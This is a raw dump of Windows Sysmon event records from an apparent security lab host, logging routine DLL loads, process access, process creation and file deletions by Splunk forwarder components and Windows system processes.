734700x8000000000000000100628Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:47.402{326FD73D-C167-6294-490B-000000005502}5920C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=0FE6D3D4B3F4B0F5502371832D12BB8E,SHA256=3DF79909021C72E70D2AE273587296E5E2D5F77315011B5C3115CFA359682647,IMPHASH=E09B42A7EA1725DA2CD99223AD969C63trueSplunk, Inc.Valid 734700x8000000000000000100627Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:47.402{326FD73D-C167-6294-490B-000000005502}5920C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=FBA0D04D5A8AEA25D86EC623A14D0056,SHA256=D64FE508393C40160D1EFB22149C69763CBAA921BD1BC74C8D4AE59A10C3B767,IMPHASH=987AB6B8B03EE421D8CC59EAFE452916trueSplunk, Inc.Valid 734700x8000000000000000100626Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:47.402{326FD73D-C167-6294-490B-000000005502}5920C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.10libxml2 librarylibxml2-libxml2.dllMD5=20596DB2126E9F188727597F0FCC7CDB,SHA256=BAD6246A2B43B07FE80643DE40B0CE49751C8E0B95B076AD94E59F16CE8D8C0C,IMPHASH=6DA659461618DB73B9BD17D114677D20trueSplunk, Inc.Valid 734700x8000000000000000100625Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:47.402{326FD73D-C167-6294-490B-000000005502}5920C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x8000000000000000100624Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:47.402{326FD73D-C167-6294-490B-000000005502}5920C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\nsi.dll10.0.14393.3297 (rs1_release_1.191001-1045)NSI User-mode interface DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationnsi.dllMD5=994E2A6D2A0B38E0968B3998E42033AC,SHA256=491F2D1DE09C39B324BCF5800198AC7CCE755F4023F1FEB3854D33716461BC27,IMPHASH=B01B7830101BC0D5FBDE4FFE2B170CF7trueMicrosoft WindowsValid 734700x8000000000000000100623Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:47.402{326FD73D-C167-6294-490B-000000005502}5920C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438,IMPHASH=C7DF3F2CF025F0BEDA797705E4F4AFBBtrueMicrosoft WindowsValid 734700x8000000000000000100622Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:47.402{326FD73D-C167-6294-490B-000000005502}5920C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3,IMPHASH=070F257E4632BC576557C4085595EAA4trueMicrosoft WindowsValid 734700x8000000000000000100621Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:47.402{326FD73D-C167-6294-490B-000000005502}5920C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\IPHLPAPI.DLL10.0.14393.2339 (rs1_release_inmarket.180611-1502)IP Helper APIMicrosoft® Windows® Operating SystemMicrosoft Corporationiphlpapi.dllMD5=3CD38EDF9CA12F91131EDEE32D1C9DF5,SHA256=AF2440640BF8BDEAAF0DECDD7C354158E415ED0AA340ABA7A6CCCDC09C1E728B,IMPHASH=98738BA55485CCA932F6D222F47FFC55trueMicrosoft WindowsValid 734700x8000000000000000100620Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:47.402{326FD73D-C167-6294-490B-000000005502}5920C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\dnsapi.dll10.0.14393.4350 (rs1_release.210407-2154)DNS Client API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationdnsapiMD5=D7651F99299B13D576A72643BFC44944,SHA256=589302E630C473DBDF4CE92C59F00B029FCA0C228E7111A764166E16025FA1A9,IMPHASH=3C043C6FF0F62DAEB8819606F79C5ECCtrueMicrosoft WindowsValid 734700x8000000000000000100619Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:47.402{326FD73D-C167-6294-490B-000000005502}5920C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecur32.dllMD5=BCF1B2F76F8A3A3E9E8F4D4322954651,SHA256=46B327CD50E728CBC22BD80F39DCEF2789AB780C77B6D285EEB90126B06EEEB5,IMPHASH=0D8FF9DE2DA5C07D680347B1A098E759trueMicrosoft WindowsValid 734700x8000000000000000100618Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:47.402{326FD73D-C167-6294-490B-000000005502}5920C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4,IMPHASH=07D6F84E3C8FD0D2C32F9398A0369BAFtrueMicrosoft WindowsValid 734700x8000000000000000100617Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:47.402{326FD73D-C167-6294-490B-000000005502}5920C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAE,IMPHASH=B511E4B82A44D3731CDA46A74F5D57EAtrueMicrosoft WindowsValid 734700x8000000000000000100616Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:47.401{326FD73D-C167-6294-490B-000000005502}5920C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5125 (rs1_release.220429-1732)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=E22D365A75901B1AED4B2A329FC3B5EC,SHA256=70073F203292301E5B6854DED0F9150B97F2E81A2E12FF40C81E978382B8D2CB,IMPHASH=154EA5DE40F0F2475E943DE8013E5692trueMicrosoft WindowsValid 734700x8000000000000000100615Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:47.401{326FD73D-C167-6294-490B-000000005502}5920C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166,IMPHASH=D6E06125849E8565A50F366A0149FB40trueMicrosoft WindowsValid 734700x8000000000000000100614Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:47.401{326FD73D-C167-6294-490B-000000005502}5920C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0,IMPHASH=76A5AA3DF6083D853F576403C8F841A8trueMicrosoft WindowsValid 10341000x8000000000000000100613Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:47.400{326FD73D-A44C-6294-0901-000000005502}53725392C:\Windows\system32\conhost.exe{326FD73D-C167-6294-490B-000000005502}5920C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x8000000000000000100612Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:47.400{326FD73D-C167-6294-490B-000000005502}5920C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484F,IMPHASH=05349EBAA635D77714868763D44881E9trueMicrosoft WindowsValid 734700x8000000000000000100611Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:47.399{326FD73D-C167-6294-490B-000000005502}5920C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\kernel32.dll10.0.14393.5066 (rs1_release.220401-1841)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=E258A076D1B87D41F724E431B3293BA5,SHA256=0670462AC0932F314B2E4A0A20B4B6F96C024C2310BD2AF21B20BF7A8EC9FF8E,IMPHASH=3CE0779E0F4E275CD51A359A98CCC682trueMicrosoft WindowsValid 734700x8000000000000000100610Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:47.399{326FD73D-C167-6294-490B-000000005502}5920C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x8000000000000000100609Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:47.399{326FD73D-C167-6294-490B-000000005502}5920C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.2.5Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exeMD5=92BD3C71158FA8B9A0821D43564A56E7,SHA256=7850C91F8D08679D7A0579D350C08CA6F6EDEA8A12226ADC2E30B4ABF8CE0BE2,IMPHASH=FD2D4472615B421BAEF1D51F46EF5F52trueSplunk, Inc.Valid 10341000x8000000000000000100608Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:47.398{326FD73D-A252-6294-0500-000000005502}416532C:\Windows\system32\csrss.exe{326FD73D-C167-6294-490B-000000005502}5920C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000100607Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:47.398{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100606Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:47.398{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100605Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:47.396{326FD73D-A44C-6294-0501-000000005502}51646008C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{326FD73D-C167-6294-490B-000000005502}5920C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100604Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:47.396{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100603Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:47.396{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000100602Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:47.392{326FD73D-C167-6294-490B-000000005502}5920C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.2.5Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{326FD73D-A253-6294-E703-000000000000}0x3e70SystemMD5=92BD3C71158FA8B9A0821D43564A56E7,SHA256=7850C91F8D08679D7A0579D350C08CA6F6EDEA8A12226ADC2E30B4ABF8CE0BE2,IMPHASH=FD2D4472615B421BAEF1D51F46EF5F52{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000100601Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:47.390{326FD73D-A262-6294-2400-000000005502}2732NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-099f25d280474ac19\channels\health\surveyor-20220530105426-129MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100600Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:47.234{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=841A43D2D85DC37FE18D59E007522544,SHA256=44A291BFAE776325B670DDE14DFFA522FDD28CFD9832F6CCAAD7A2C7FB79398A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x8000000000000000100599Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:47.046{326FD73D-C166-6294-480B-000000005502}67603768C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae795|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae2c6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+643d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+65dfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+9dcf50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x8000000000000000100598Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:47.046{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146,IMPHASH=F67CBD9561C1FEF51B817BA184E81D2EtrueMicrosoft WindowsValid 734700x8000000000000000100597Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:47.046{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1A,IMPHASH=E7FD2920222985E31019D022BB39EFBEtrueMicrosoft WindowsValid 23542300x8000000000000000100659Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:48.484{326FD73D-A44C-6294-0501-000000005502}5164NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=ED46D36EEC474496F4EE890B6E6A3FBB,SHA256=CD3EFD1F17B5E5E1FD98E11D39AFA116D9111F6098453A857EBB4F32B7208E8B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100658Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:48.015{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C1C21267257F746248C71F50D968A7FF,SHA256=AE2897ED5F0FBB2DF1C8823D26EEE3A601BA396EF8A42742555B0321803F429C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 734700x8000000000000000100763Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.906{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659C,IMPHASH=94524C03C5380F78283785F1E05E667DtrueMicrosoft WindowsValid 10341000x8000000000000000100762Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.906{326FD73D-C169-6294-4B0B-000000005502}44606804C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x8000000000000000100761Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.906{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146,IMPHASH=F67CBD9561C1FEF51B817BA184E81D2EtrueMicrosoft WindowsValid 734700x8000000000000000100760Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.906{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1A,IMPHASH=E7FD2920222985E31019D022BB39EFBEtrueMicrosoft WindowsValid 23542300x8000000000000000100759Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.874{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9BB1B7E58CAEBBBE86065B769AE7BB4C,SHA256=28A956370F1C59647B3E87E71C2840B613D0D5E90C2103060F4D98BB6C7089C8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 734700x8000000000000000100758Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.718{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft 